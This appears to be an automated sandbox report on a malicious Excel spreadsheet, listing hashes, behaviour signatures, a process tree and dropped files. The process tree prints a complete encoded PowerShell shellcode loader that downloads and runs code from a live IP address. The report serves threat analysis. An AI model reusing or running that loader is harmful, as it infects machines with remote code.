Analysis

  • max time kernel
    18s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 22:03

General

  • Target

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls

  • Size

    46KB

  • MD5

    836c57d347726357d1e67ec4fee4960c

  • SHA1

    79b73aa267a84dcf5fe8cb9b7aad481428f4f5fe

  • SHA256

    2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db

  • SHA512

    edb98a134333a83be3ed49367ad2ea4e5d31c419e5b45840ffa2b804b9c7f2dfd9712ea98fd83831b253b6363f92f77fda7a740bff3aea3d68d1ddb01968b2ef

  • SSDEEP

    768:H4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\2d593d80c97bf04124422068c8bcd91070750bd7792eb39926790fbc229589db.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\epniryue.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DEE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8DED.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES8DEE.tmp

    Filesize

    1KB

    MD5

    b8ae2cdb93e246788f1ae79138ba7a83

    SHA1

    aeadef973acc26e779b103b047d5ff6fd81e35ca

    SHA256

    35cbd7777c718bee1a8a6989160b09b5a3656f6e346dd27f621081cf346dd8a1

    SHA512

    3514bdb0ef725bcf3de249447beb28b9218978fb85dfb5c91bf2d0f85ec9031e53d56bc17cd07692399eb2f6b69d516956b0a6f114823f871c29d9431845cdf0

  • C:\Users\Admin\AppData\Local\Temp\epniryue.dll

    Filesize

    3KB

    MD5

    bf37533dcde5a450c9c446369263ce00

    SHA1

    45d2c43c7288704ae5e5dc26b663905cd3b4eec5

    SHA256

    da9db8eae658f3ff6d082ca74ed0805110a71f00b58d235e19c2f63f25e9a765

    SHA512

    de3fae90b7667b575b397ad896fafd40a2788f765de10acaeb009869771510e1e46041a0cf1c18c3b0e7845643f195bac548559ac11c178aa719e716cbc9fe47

  • C:\Users\Admin\AppData\Local\Temp\epniryue.pdb

    Filesize

    7KB

    MD5

    7e94142a8954161750ade8270e9dc08d

    SHA1

    c1d373709b2e3229631fd748dce48c23847a92e4

    SHA256

    c22c33275546729cff5e0a196c707b6fc632cf078686d36fd51f1d14ebba81b2

    SHA512

    7cabd6fcb1dca5debebfc1aea4802c562e2f6b7c8ca327b928b0bf505cb21a32db714af5747d2853dd07ec67f377b5b1aa0879e7b31462d8369ace2a84d71c0a

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC8DED.tmp

    Filesize

    652B

    MD5

    848b062a90a31c3dbfe9873f6bbca1c4

    SHA1

    8877d3f861250338bc5073cda2373f2e6a6897e5

    SHA256

    f6d22a1c3460e18d594609f8a746943ff5a02605a1ac1ae5d71c0ed7dae6d310

    SHA512

    b5164482999ecdbf3cf5882423b21408ef9c574c1456721ad1f972424e28e04419b031b74097dca7ea99b999e8e6974b7f1aabcf8ca92b35ff46b3e1bffd451f

  • \??\c:\Users\Admin\AppData\Local\Temp\epniryue.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\epniryue.cmdline

    Filesize

    309B

    MD5

    dfeb717e9130135f3fc329b25d7aed56

    SHA1

    478471f2f89a9e695ebb91945934c17f85a75d1c

    SHA256

    031da5768e1ed6be3f7360fb61fd650efc29c75ef9d052a2c98aebf257ac0da1

    SHA512

    dcef60a69a2289ab72be2880655bf2161b5ccec4d9aade2603166b4a67aa45aa4444460d0bfeedd540a57c2465d02075eca0562d4276f3e397752420bd400eba

  • memory/1964-8-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-7-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-1-0x0000000071DBD000-0x0000000071DC8000-memory.dmp

    Filesize

    44KB

  • memory/1964-4-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-5-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-3-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-2-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1964-27-0x0000000071DBD000-0x0000000071DC8000-memory.dmp

    Filesize

    44KB

  • memory/1964-28-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/1964-29-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB